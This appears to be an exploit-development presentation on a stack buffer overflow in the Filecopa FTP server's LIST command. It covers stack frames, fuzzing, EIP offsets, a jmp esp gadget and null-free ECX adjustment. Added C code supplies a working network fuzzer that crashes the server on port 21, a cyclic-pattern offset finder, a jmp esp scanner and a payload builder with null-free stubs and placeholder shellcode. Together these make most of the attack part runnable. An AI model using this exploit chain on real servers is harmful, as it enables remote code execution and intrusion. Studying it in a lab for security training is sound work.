Software Exploitation Techniques by Amit Malik
Post on 29-Nov-2014
Presented by: Amit Malik (a.k.a. DouBle_Zer0), m.amit30@gmail.com
Application overview
Debuggers
Stack based buffer overflow
Demo
Application overview: Filecopa FTP (File Transfer Protocol) server
Listens on port 21
Vulnerable to a stack-based buffer overflow
Debuggers: the all-time favorite is OllyDbg
Why debuggers? Breakpoints: stop the program at an instruction of interest and inspect the registers, the stack and memory
Immunity Debugger
Others
First described in 1972 (Computer Security Technology Planning Study).
Exploited in the wild in 1988 by the Morris worm.
Published in Phrack in 1996: Aleph One, "Smashing the Stack for Fun and Profit."
Each function call creates its own stack frame. The caller's frame is the parent frame; the called function's frame is the child frame. For example:

    main() {
        sum();
    }

    ASM pseudo:
    _main:
    123: push ebp          ; save the caller's frame pointer
    124: mov ebp,esp       ; start main()'s frame
    125: sub esp,val       ; reserve space for main()'s locals
    126: call _sum         ; pushes the return address (127) and jumps to _sum
    127: mov esp,ebp       ; discard the locals
    128: pop ebp           ; restore the caller's frame pointer
    129: ret               ; pop the return address into EIP
Stack while sum() is executing (higher addresses at the top; the stack grows downward, toward the unallocated space):

    +----------------------+
    | Ret startup()        |  return address into the C runtime startup code
    +----------------------+
    | ebp                  |  main()'s saved frame pointer (pushed at 123)
    +----------------------+
    | Locals main()        |  reserved by sub esp,val (125)
    +----------------------+
    | Ret(127)             |  return address into main(), pushed by call _sum (126)
    +----------------------+
    | ebp                  |  sum()'s saved frame pointer
    +----------------------+
    | Locals sum()         |
    +----------------------+
    | Unallocated space    |
    +----------------------+
              |
              v  stack growth
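The frame layout above, measured from inside a running function, as an added example that is not part of the original slides. It assumes a frame-pointer based layout (saved ebp/rbp with the return address in the slot right above it), as GCC or clang produce on x86, x86-64 and AArch64; the struct, the function names and the 64-byte buffer are this example's own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* What one frame looks like from the inside. Assumption: a frame-pointer based
 * layout (saved ebp/rbp, then the return address right above it), as produced by
 * GCC or clang on x86, x86-64 and AArch64; using the two builtins below makes the
 * compiler keep a frame pointer for this function. */
struct frame_facts {
    ptrdiff_t buf_to_ret;   /* bytes from buf[0] up to the saved return address slot */
    int ret_slot_matches;   /* 1 if that slot really holds this call's return address */
};

__attribute__((noinline)) struct frame_facts measure_frame(const char *input)
{
    char buf[64];                                      /* "Locals sum()" on the slide */
    void **fp = (void **)__builtin_frame_address(0);   /* address of the saved ebp/rbp */
    void *ret = __builtin_return_address(0);           /* "Ret(127)": where we go back to */
    struct frame_facts f;

    /* The safe counterpart of the copy that overflows: never write past buf */
    strncpy(buf, input, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';

    f.buf_to_ret = (char *)(fp + 1) - buf;   /* return address sits one slot above saved ebp */
    f.ret_slot_matches = (fp[1] == ret);
    __asm__ __volatile__("" : : "r"(buf) : "memory");  /* keep buf alive in the frame */
    return f;
}

/* Minimum input length that reaches the return address: everything copied past
 * buf_to_ret bytes lands on Ret; the slide's AAAA... run does exactly this. */
size_t bytes_needed_to_reach_ret(void)
{
    return (size_t)measure_frame("probe").buf_to_ret;
}

int main(void)
{
    struct frame_facts f = measure_frame("hello");
    printf("buf[0] is %td bytes below the saved return address (slot valid: %d)\n",
           f.buf_to_ret, f.ret_slot_matches);
    printf("an unbounded copy of more than %zu bytes would overwrite it\n",
           bytes_needed_to_reach_ret());
    return 0;
}
```

Compile with gcc or clang and run: buf_to_ret is at least the 64 bytes of the buffer plus the saved frame pointer (more when a stack canary sits between them), and ret_slot_matches confirms that the slot right above the saved ebp is the one `ret` pops into EIP. The bounded strncpy is the safe form of the copy; replace it with strcpy on an attacker-controlled string and any input longer than buf_to_ret bytes lands on Ret(127).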
If the input written into the local variables is larger than the space allocated to them, then the extra bytes run upward through the frame: first over sum()'s saved ebp, then over Ret(127), the saved EIP.
Before (the overflow has written AAAA... over sum()'s locals, the saved ebp and Ret(127)):

    +----------------------+
    | Ret startup()        |
    +----------------------+
    | ebp                  |
    +----------------------+
    | Locals main()        |
    +----------------------+
    | AAAAAAAA             |  <- Ret(127): saved EIP, now 0x41414141
    +----------------------+
    | AAAAAAAA             |  <- sum()'s saved ebp
    +----------------------+
    | AAAAAAAAAAAA...      |  <- Locals sum()
    +----------------------+
    | Unallocated space    |
    +----------------------+

After (the bytes that land on Ret(127) are replaced with the address of a jmp esp instruction; when sum() returns, EIP becomes that address and jmp esp transfers control to the data on the stack):

    +----------------------+
    | Ret startup()        |
    +----------------------+
    | ebp                  |
    +----------------------+
    | Locals main()        |
    +----------------------+
    | jmp esp (address)    |  <- Ret(127)
    +----------------------+
    | AAAAAAAA             |
    +----------------------+
    | AAAAAAAAAAAA...      |
    +----------------------+
    | Unallocated space    |
    +----------------------+
Vulnerable to buffer overflow (LIST command).
But how do we know that the server is vulnerable?
Three methods to find security bugs:
1. Fuzzing
2. Reverse engineering
3. Source code auditing
Fuzzing: send invalid, unexpected or random data to the inputs of a program. If the program fails or crashes, the defect can be noted.
OK, let's send invalid input to our server.
Still listening? No... good.
But we don't know yet which function is causing this problem.
Reverse engineering is the process of analyzing a subject system to create representations of the system at a higher level of abstraction.
Generally used after fuzzing.
Provides in-depth information about the target, sometimes more than source code.
Calculate the offset for EIP (how many bytes of input come before the saved return address).
ESP is pointing to our buffer.
Problem: we don't have much space on the stack (only about 13-14 bytes after the saved EIP).
Now what? Check the other registers.
ECX is pointing at our buffer, but not directly (not at the start of our data).
But we do have some bytes on the stack: use them to adjust ECX and then jump to ECX.
We need a jmp esp (address) first.
Note: hard-coding a stack address is not good practice. It contains null bytes, and the address may change.
Search for the address in DLLs, because DLL addresses are static, at least for the same service pack.
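Fuzzing the LIST command and calculating the EIP offset, as an added example that is not part of the original presentation: it sends LIST with a growing argument filled with a cyclic pattern (the scheme Metasploit's pattern_create uses, where every 4-byte window is unique) until the connection drops, and then maps the four bytes found in EIP back to an offset in the input. Assumptions: POSIX sockets (run from a Linux box against the target), anonymous login is accepted, and the function names, the step sizes and the credentials are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

#define PATTERN_MAX (26 * 26 * 10 * 3)   /* 20280 bytes before the sequence repeats */

static char g_cmd[PATTERN_MAX + 16];     /* "LIST " + pattern + "\r\n" */

/* Fill out[0..n) with the cyclic pattern Aa0Aa1Aa2...Az9Ba0... (the same scheme
 * as Metasploit's pattern_create): every 4-byte window is unique, so the 4 bytes
 * that land in EIP identify a position in the input. Returns the bytes written
 * (capped at PATTERN_MAX). */
size_t pattern_create(char *out, size_t n)
{
    size_t pos = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3; i++) {
                    if (pos == n) return pos;
                    out[pos++] = trip[i];
                }
            }
    return pos;
}

/* The debugger shows EIP as a 32-bit little-endian value (e.g. 0x68423368 for the
 * bytes "h3Bh"). Return the offset of those 4 bytes in a pattern of length n, i.e.
 * how many input bytes precede the saved EIP; -1 if they are not from the pattern. */
long pattern_offset(uint32_t eip, size_t n)
{
    unsigned char needle[4] = { eip & 0xff, (eip >> 8) & 0xff,
                                (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    char *pat = malloc(n);
    if (!pat) return -1;
    size_t len = pattern_create(pat, n);
    long found = -1;
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

/* Build "LIST <pattern of arg_len bytes>\r\n" into out; returns the total length. */
size_t build_list_command(char *out, size_t cap, size_t arg_len)
{
    if (arg_len > PATTERN_MAX || cap < 5 + arg_len + 3) return 0;
    memcpy(out, "LIST ", 5);
    pattern_create(out + 5, arg_len);
    memcpy(out + 5 + arg_len, "\r\n", 3);   /* includes the terminating NUL */
    return 7 + arg_len;
}

/* Log in (assumed anonymous credentials; adjust as needed) and send one LIST probe.
 * Returns 1 if the server still answered, 0 if the connection died (the crash the
 * slides look for) and -1 if it could not connect. */
int send_probe(const char *host, int port, size_t arg_len)
{
    char rsp[512];
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    if (inet_pton(AF_INET, host, &sa.sin_addr) != 1) return -1;
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return -1;
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) { close(s); return -1; }
    recv(s, rsp, sizeof rsp, 0);                                      /* 220 banner */
    send(s, "USER anonymous\r\n", 16, 0); recv(s, rsp, sizeof rsp, 0);
    send(s, "PASS a@b.c\r\n", 12, 0);     recv(s, rsp, sizeof rsp, 0);
    size_t n = build_list_command(g_cmd, sizeof g_cmd, arg_len);
    send(s, g_cmd, n, 0);
    int alive = recv(s, rsp, sizeof rsp, 0) > 0;   /* no reply at all: the server is gone */
    close(s);
    return alive;
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <host> [eip_hex]\n", argv[0]); return 1; }
    if (argc > 2) {   /* second run: translate the EIP seen in the debugger into the offset */
        uint32_t eip = (uint32_t)strtoul(argv[2], NULL, 16);
        printf("EIP offset: %ld\n", pattern_offset(eip, PATTERN_MAX));
        return 0;
    }
    for (size_t len = 100; len <= 5000; len += 100) {   /* first run: grow the LIST argument */
        int r = send_probe(argv[1], 21, len);
        printf("LIST with %zu bytes: %s\n", len,
               r == 1 ? "answered" : r == 0 ? "connection dropped" : "connect failed");
        if (r != 1) break;   /* server stopped listening: attach the debugger and read EIP */
    }
    return 0;
}
```

Run it once against the server with the debugger attached; when the connection drops, read EIP from the debugger (it will hold four pattern bytes rather than 0x41414141) and run it again with that value to get the number of bytes that sit before the saved return address. That number is the EIP offset the next slides need.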
ECX is at 00652984 but our data is at 006529cc (on my system).
Increase ECX, but there is a small problem: that data is the region used to overwrite EIP.
So increasing ECX to that address gives little space (only about 234 bytes).
So increase ECX further, so that it jumps over the saved EIP.
So add ecx,152. Does it work?
No. It encodes with null bytes (81 C1 98 00 00 00), which can't be used.
OK, add cx,152 instead: the 16-bit form (66 81 C1 98 00) is shorter but still carries one null byte, so increase the immediate until neither of its bytes is zero (for example add cx,0x0101), or split it into adds of at most 0x7f (add ecx,0x7f is 83 C1 7F, with no null byte).
Now jump to ECX (jmp ecx), and we have our shellcode ready.
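The last three slides as working code, added here and not part of the original presentation: find a jmp esp in a mapped DLL whose address has no null byte, encode "add ecx,delta" without null bytes (the slide's add ecx,152 and add cx,152 both fail that check), and assemble the LIST argument with the few bytes that survive after the saved EIP. The ECX value, the data address and the 13 bytes of room after EIP are taken from the slides; the 0x7C800000 load address, the image contents, the EIP offset of 200, the int3 (0xCC) placeholder shellcode and all function names are this example's own assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

static unsigned char g_img[300];       /* constructed stand-in for a mapped DLL */
static unsigned char g_stub[32];
static unsigned char g_payload[512];

/* Scan a mapped image for FF E4 (jmp esp) and return base+offset for the first hit
 * whose address has no 0x00 byte (it has to survive a string copy); 0 if none.
 * Assumption: img holds the module as laid out in memory, base is its load address. */
uint32_t find_jmp_esp(const unsigned char *img, size_t len, uint32_t base)
{
    for (size_t i = 0; i + 2 <= len; i++) {
        if (img[i] != 0xFF || img[i + 1] != 0xE4) continue;
        uint32_t va = base + (uint32_t)i;
        if ((va & 0xff) && ((va >> 8) & 0xff) && ((va >> 16) & 0xff) && (va >> 24))
            return va;
    }
    return 0;
}

/* x86 encodings used (32-bit mode):
 *   add ecx, imm8   83 C1 ib  (ib is sign-extended, so only 0x01..0x7f add a positive amount)
 *   add cx,  imm16  66 81 C1 iw
 *   add ecx, imm32  81 C1 id
 *   jmp ecx         FF E1
 * The slide's add ecx,152 is 81 C1 98 00 00 00 and add cx,152 is 66 81 C1 98 00:
 * both carry 0x00, which ends the command string on the server side. */
size_t encode_add_ecx_nullfree(unsigned n, unsigned char *out, size_t cap)
{
    size_t len = 0;
    unsigned lo = n & 0xff, hi = (n >> 8) & 0xff;
    /* One 16-bit add when neither immediate byte is zero (valid as long as the
     * low 16 bits of ecx do not wrap, which holds for the slide's addresses) */
    if (n >= 0x100 && n <= 0xffff && lo && hi) {
        if (cap < 5) return 0;
        out[len++] = 0x66; out[len++] = 0x81; out[len++] = 0xC1;
        out[len++] = (unsigned char)lo; out[len++] = (unsigned char)hi;
        return len;
    }
    /* Otherwise chain 3-byte adds of at most 0x7f: no null byte can appear */
    while (n > 0) {
        unsigned step = n > 0x7f ? 0x7f : n;
        if (cap - len < 3) return 0;
        out[len++] = 0x83; out[len++] = 0xC1; out[len++] = (unsigned char)step;
        n -= step;
    }
    return len;
}

/* The bytes right after the saved EIP, where jmp esp lands: "add ecx,delta ; jmp ecx".
 * Returns the stub length, 0 if it does not fit in cap bytes. */
size_t build_ecx_stub(unsigned delta, unsigned char *out, size_t cap)
{
    size_t len = delta ? encode_add_ecx_nullfree(delta, out, cap) : 0;
    if ((delta && len == 0) || cap - len < 2) return 0;
    out[len++] = 0xFF; out[len++] = 0xE1;   /* jmp ecx */
    return len;
}

int has_null(const unsigned char *p, size_t len) { return memchr(p, 0, len) != NULL; }

/* LIST argument: [shellcode][nop padding up to EIP][jmp esp address, little-endian][stub].
 * post_eip_room is how many bytes survive past the saved EIP (the slide measured 13-14).
 * Returns the length, or 0 if something does not fit or a null byte crept in. */
size_t build_payload(unsigned char *out, size_t cap, size_t eip_offset,
                     uint32_t jmp_esp, unsigned ecx_delta, size_t post_eip_room,
                     const unsigned char *shellcode, size_t sc_len)
{
    if (sc_len > eip_offset || cap < eip_offset + 4 + post_eip_room) return 0;
    memcpy(out, shellcode, sc_len);
    memset(out + sc_len, 0x90, eip_offset - sc_len);
    size_t len = eip_offset;
    for (int i = 0; i < 4; i++) out[len++] = (jmp_esp >> (8 * i)) & 0xff;
    size_t stub = build_ecx_stub(ecx_delta, out + len, post_eip_room);
    if (stub == 0) return 0;
    len += stub;
    return has_null(out, len) ? 0 : len;
}

/* Worked instance. Hypothetical image: two jmp esp gadgets, the first at an address
 * with a null byte in it. */
uint32_t demo_find_gadget(void)
{
    memset(g_img, 0x90, sizeof g_img);
    g_img[2] = 0xFF;   g_img[3] = 0xE4;     /* 0x7C800002: rejected, contains 0x00 */
    g_img[272] = 0xFF; g_img[273] = 0xE4;   /* 0x7C800110: usable */
    return find_jmp_esp(g_img, sizeof g_img, 0x7C800000u);
}

size_t build_demo_payload(void)
{
    static const unsigned char sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };   /* int3 placeholder shellcode */
    unsigned delta = 0x006529ccu - 0x00652984u;   /* slide values: 0x48 = 72 bytes to our data */
    return build_payload(g_payload, sizeof g_payload, 200, demo_find_gadget(),
                         delta, 13, sc, sizeof sc);
}

int main(void)
{
    size_t n = build_demo_payload();
    printf("gadget at 0x%08X, payload %zu bytes, bytes after EIP:", demo_find_gadget(), n);
    for (size_t i = 204; i < n; i++) printf(" %02X", g_payload[i]);
    printf("\n");
    return 0;
}
```

With the slide's delta of 72 the stub is 83 C1 48 FF E1, five bytes, well inside the 13 bytes available after EIP; with 152 the chained form is 83 C1 7F 83 C1 19 FF E1, eight bytes, still fits, while the raw add ecx,152 would be rejected by has_null. The delta is whatever the shellcode address minus the ECX value seen in the debugger is, so if the shellcode is placed elsewhere in the buffer, recompute it from those two addresses.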